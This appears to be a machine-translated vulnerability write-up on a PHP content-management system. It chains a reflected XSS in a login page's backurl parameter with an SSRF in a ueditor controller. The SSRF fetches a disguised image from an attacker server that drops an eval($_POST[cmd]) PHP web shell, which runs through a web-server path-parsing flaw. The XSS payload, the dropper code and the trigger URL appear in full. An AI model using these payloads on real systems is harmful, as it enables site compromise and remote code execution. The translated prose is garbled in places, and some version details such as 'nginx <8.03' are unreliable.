XSS
Path: /plugins/template/login.php
url
values:
$url =conf('runmode')==1 ? $path.'index.php?location=user&backurl='.$backurl.'&act=' : $path.'?location=user&backurl='.$backurl.'&act=' ;
Here $backurl
is our controllable:
$backurl=getform('backurl','get');
Also note that there href
is no double quotation marks parcels $url
, which leads us to be able to just use a space separating property, we want to construct a property, you can F12
look at the source:
the purpose we want to achieve:
<a href=/?location=user&backurl=test onmouseover=javascript:alert(1111) test=&act=login>
$backurl=test onmouseover=javascript:alert(1111) test=
Bomb Box Success:
ssrf + middleware resolve
Vulnerability file:
/plugins/ueditor/php/controller.php
The vulnerable code:
you can see this section for receiving user input url
, in addition to two parameters:
the user input upfolder
parameters, to upload files path, in addition action
to ascatchimage
We controlled two parameters that action
and upfolder
look at what these two parameters specific filter measures:
-
safeword()
:
Function filtering the other symbols, letters and numbers reserved only -
safe_url()
:
Here Duiurl
retain the input ofurl
thea-zA-Z0-9,.:=@?_\/\s]
Then look at the function to transfer files down_url()
,
look at the focus of the url
filtering function does not filter the ip and domain name, in addition to the file name and file extension from our input url
, save the file does not rename, just ask the file extension can not be empty , as well as file suffix must be in the white list, take a look conf()
you can see that we can not see a legal file extension, but you can see and controller.php
there is the same directory config.json
file, which has a:
"fileAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"],
Simply looked dangerous file extension are filtered out, then create an image directly Trojans (although means very old), the contents of the file: <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
, Trojans into making good on its own server, and then access contorller.php
sending a request,
which time and then visit:http://www.gohosts.com/upload/file/2.jpg/.php
Then you can /upload/file
see the next path generates a shell.php
view shell.php
:
you can see written shell
successfully. Here to take advantage of the nginx <8.03 and IIS 7.0 / 7.5 middleware parsing vulnerability.